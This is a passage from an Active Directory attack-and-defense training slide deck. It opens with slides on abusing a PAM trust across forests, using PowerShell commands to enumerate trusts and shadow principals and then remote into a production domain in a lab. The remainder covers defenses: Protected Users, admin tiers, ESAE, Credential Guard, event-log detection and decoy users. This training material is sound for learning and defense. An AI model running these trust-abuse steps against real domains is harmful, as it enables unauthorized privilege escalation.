https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Abusing PAM Trust


• PAM trust is usually enabled between a Bastion or Red forest and a
production/user forest which it manages.
• PAM trust provides the ability to access the production forest with high
privileges without using credentials of the bastion forest. Thus, better
security for the bastion forest which is much desired.
• To achieve the above, Shadow Principals are created in the bastion
domain which are then mapped to DA or EA groups SIDs in the
production forest.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 336

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 336


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Abusing PAM Trust


• We have DA access to the techcorp.local forest. By enumerating trusts
and hunting for access, we can enumerate that we have Administrative
access to the bastion.local forest.
• From techcorp-dc:
Get-ADTrust -Filter *
Get-ADObject -Filter {objectClass -eq
"foreignSecurityPrincipal"} -Server bastion.local

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 337

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 337


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Abusing PAM Trust


• On bastion-dc, enumerate if there is a PAM trust:
$bastiondc = New-PSSession bastion-dc.bastion.local
Invoke-Command -ScriptBlock {Get-ADTrust -Filter
{(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -
eq $False)}} -Session $bastiondc

• Check which users are members of the Shadow Principals:


Invoke-Command -ScriptBlock {Get-ADObject -SearchBase
("CN=Shadow Principal Configuration,CN=Services," + (Get-
ADRootDSE).configurationNamingContext) -Filter * -Properties
* | select Name,member,msDS-ShadowPrincipalSid | fl} -Session
$bastiondc

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 338

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 338


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Abusing PAM Trust


• Establish a direct PSRemoting session on bastion-dc and access
production.local:
Enter-PSSession 192.168.102.1 -Authentication
NegotiateWithImplicitCredential

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 339

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 339


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 340


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 341

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 341


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 342

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 342


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense


• Protect and Limit Domain Admins
• Isolate administrative workstations
• Secure local administrators
• Time bound and just enough administration
• Isolate administrators in a separate forest and breach containment using
Tiers and ESAE

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 343

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 343


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Protect and Limit Domain Admins


• Reduce the number of Domain Admins in your environment.
• Do not allow or limit login of DAs to any other machine other than the
Domain Controllers. If logins to some servers is necessary, do not allow
other administrators to login to that machine.
• (Try to) Never run a service with a DA. Credential theft protections
which we are going to discuss soon are rendered useless in case of a
service account.
• Set "Account is sensitive and cannot be delegated" for DAs.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 344

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 344


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Protect and Limit Domain Admins


Protected Users Group
• Protected Users is a group introduced in Server 2012 R2 for "better protection against
credential theft" by not caching credentials in insecure ways. A user added to this group has
following major device protections:
– Cannot use CredSSP and WDigest - No more cleartext credentials caching.
– NTLM hash is not cached.
– Kerberos does not use DES or RC4 keys. No caching of clear text cred or long term keys.
• If the domain functional level is Server 2012 R2, following DC protections are available:
– No NTLM authentication.
– No DES or RC4 keys in Kerberos pre-auth.
– No delegation (constrained or unconstrained)
– No renewal of TGT beyond initial four hour lifetime - Hardcoded, unconfigurable
"Maximum lifetime for user ticket" and "Maximum lifetime for user ticket renewal"

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 345

https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-
and-management/protected-users-security-group
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/how-to-
configure-protected-accounts#BKMK_AddtoProtectedUsers

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 345


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Protect and Limit Domain Admins


Protected Users Group
• Needs all domain control to be at least Server 2008 or later (because
AES keys).
• Not recommended by MS to add DAs and EAs to this group without
testing "the potential impact" of lock out.
• No cached logon i.e. no offline sign-on.
• Having computer and service accounts in this group is useless as their
credentials will always be present on the host machine.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 346

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 346


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Isolate administrative workstations


Privileged Administrative Workstations (PAWs)
• A hardened workstation for performing sensitive tasks like
administration of domain controllers, cloud infrastructure, sensitive
business functions etc.
• Can provides protection from phishing attacks, OS vulnerabilities,
credential replay attacks.
• Admin Jump servers to be accessed only from a PAW, multiple strategies
– Separate privilege and hardware for administrative and normal tasks.
– Having a VM on a PAW for user tasks.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 347

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 347


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://docs.microsoft.com/en-us/previous-versions/mt227395(v=msdn.10)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Time Bound Administration - JIT


• Just In Time (JIT) administration provides the ability to grant time-bound
administrative access on per-request bases.
• Check out Temporary Group Membership! (Requires Privileged Access
Management Feature to be enabled which can't be turned off later)
Add-ADGroupMember -Identity 'Domain Admins' -Members
newDA -MemberTimeToLive (New-TimeSpan -Minutes 60)

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 349

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 349


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Time Bound Administration - JEA


• JEA (Just Enough Administration) provides role based access control for
PowerShell based remote delegated administration.
• With JEA non-admin users can connect remotely to machines for doing
specific administrative tasks.
• For example, we can control the command a user can run and even
restrict parameters which can be used.
• JEA endpoints have PowerShell transcription and logging enabled.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 350

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 350


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - Tier Model


Active Directory Administrative Tier Model
• Composed of three levels only for administrative accounts:

– Tier 0 – Accounts, Groups and computers which have privileges across the enterprise like domain
controllers, domain admins, enterprise admins. .

– Tier 1 - Accounts, Groups and computers which have access to resources having significant amount of
business value. A common example role is server administrators who maintain these operating systems with
the ability to impact all enterprise services.

– Tier 2 - Administrator accounts which have administrative control of a significant amount of business value
that is hosted on user workstations and devices. Examples include Help Desk and computer support
administrators because they can impact the integrity of almost any user data.

• Control Restrictions - What admins control.


• Logon Restrictions - Where admins can log-on to.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 351

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 351


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Tier Model : Control Restrictions

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 352

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 352


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Tier Model : Logon Restrictions

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 353

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 353


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - ESAE


ESAE (Enhanced Security Admin Environment)
• Dedicated administrative forest for managing critical assets like
administrative users, groups and computers.
• Since a forest is considered a security boundary rather than a domain,
this model provides enhanced security controls.
• The administrative forest is also called the Red Forest.
• Administrative users in a production forest are used as standard non-
privileged users in the administrative forest.
• Selective Authentication to the Red Forest enables stricter security
controls on logon of users from non-administrative forests.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 354

https://technet.microsoft.com/en-us/windows-server-docs/security/securing-
privileged-access/securing-privileged-access-reference-material#ESAE_BM

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 354


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

ESAE

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 355

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 355


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - Credential Guard


• It "uses virtualization-based security to isolate secrets so that only
privileges system software can access them".
• Effective in stopping PTH and Over-PTH attacks by restricting access to
NTLM hashes and TGTs. It is not possible to write Kerberos tickets to
memory even if we have credentials.
https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 356

https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Defeating%20Pass-
the-Hash-Separation-Of-Powers-wp.pdf

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 356


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - Credential Guard


• But, credentials for local accounts in SAM and Service account
credentials from LSA Secrets are NOT protected.
• Credential Guard cannot be enabled on a domain controller as it breaks
authentication there.
• Only available on the Windows 10 Enterprise edition and Server 2016.
• Mimikatz can bypass it but still, no need to not use it.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 357

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 357


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - Device Guard (WDAC)


• It is a group of features "designed to harden a system against malware attacks. Its
focus is preventing malicious code from running by ensuring only known good code
can run."
• Three primary components:
– Configurable Code Integrity (CCI) - Configure only trusted code to run
– Virtual Secure Mode Protected Code Integrity - Enforces CCI with Kernel Mode (KMCI) and User
Mode (UMCI)
– Platform and UEFI Secure Boot - Ensures boot binaries and firmware integrity
https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-
virtualization-based-security-and-code-integrity-policies

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 358

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 358


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://docs.microsoft.com/en-us/defender-for-identity/
https://docs.microsoft.com/en-us/defender-for-identity/understanding-security-
alerts

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-
for-ActiveDirectory-Domination.pdf

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - Golden Ticket


• Some important Event ID:
• Event ID
– 4624: Account Logon
– 4672: Admin Logon

Get-WinEvent -FilterHashtable
@{Logname='Security';ID=4672} -MaxEvents 1 | Format-List
–Property *

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 362

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 362


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - Silver Ticket


• Event ID
– 4624: Account Logon
– 4634: Account Logoff
– 4672: Admin Logon
Get-WinEvent -FilterHashtable
@{Logname='Security';ID=4672} -MaxEvents 1 | Format-List
–Property *

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 363

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 363


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Configuring Additional LSA Protection: https://docs.microsoft.com/en-us/windows-


server/security/credentials-protection-and-management/configuring-additional-lsa-
protection

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://technet.microsoft.com/en-us/library/cc755321(v=ws.10).aspx

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - Deception


• Deception is a very effective technique in active directory defense.
• By using decoy domain objects, defenders can trick adversaries to follow
a particular attack path which increases chances of detection and
increase their cost in terms of time.
• Traditionally, deception has been limited to leave honey credentials on
some boxes and check their usage but we can use it effectively during
other phases of an attack.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 375

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 375


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - Deception


• What to target? Adversary mindset of going for the "lowest hanging fruit" and
illusive superiority over defenders.
• We must provide the adversaries what they are looking for. For example, what
adversaries look for in a user object:
– A user with high privileges.
– Permissions over other objects.
– Poorly configured ACLs.
– Misconfigured/dangerous user attributes and so on.
• Let's create some user objects which can be used for deceiving adversaries. We can
use Deploy-Deception for this: https://github.com/samratashok/Deploy-Deception
• Note that Windows Settings|Security Settings|Advanced Audit Policy
Configuration|DS Access|Audit Directory Service Access Group Policy needs to be
configured to enable 4662 logging.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 376

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 376


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - User Deception


• Creates a decoy user whose password never expires and a 4662 is
logged whenever x500uniqueIdentifier - d07da11f-8a3d-42b6-b0aa-
76c962be719a property of the user is read.:
Create-DecoyUser -UserFirstName user -UserLastName
manager -Password Pass@123 | Deploy-UserDeception -
UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-
b0aa-76c962be719a -Verbose

• This property is not read by net.exe, WMI classes (like


Win32_UserAccount) and ActiveDirectory module. But LDAP based tools
like PowerView and ADExplorer trigger the logging.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 377

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 377


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Detection and Defense - User Deception


• Create a decoy user named decda and make it a member of the Domain
Admins group. As a protection against potential abuse, Deny logon to the user
on any machine.
Create-DecoyUser -UserFirstName dec -UserLastName da -
Password Pass@123 | Deploy-PrivilegedUserDeception -Technique
DomainAdminsMemebership -Protection DenyLogon -Verbose

• If there is any attempt to use the user credentials (password or hashes) a


4768 is logged.
• Any enumeration which reads DACL or all properties for the user will result in
a 4662 logging.
INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 378

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 378


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Thank you
• Please provide feedback.
• Follow me @chiragsavla94
[email protected]
• For our other courses, please visit -
https://bootcamps.pentesteracademy.com/
• For other labs: https://www.pentesteracademy.com/redlabs
• For lab access/extension/support, please contact :
[email protected]

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 379

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 379

You might also like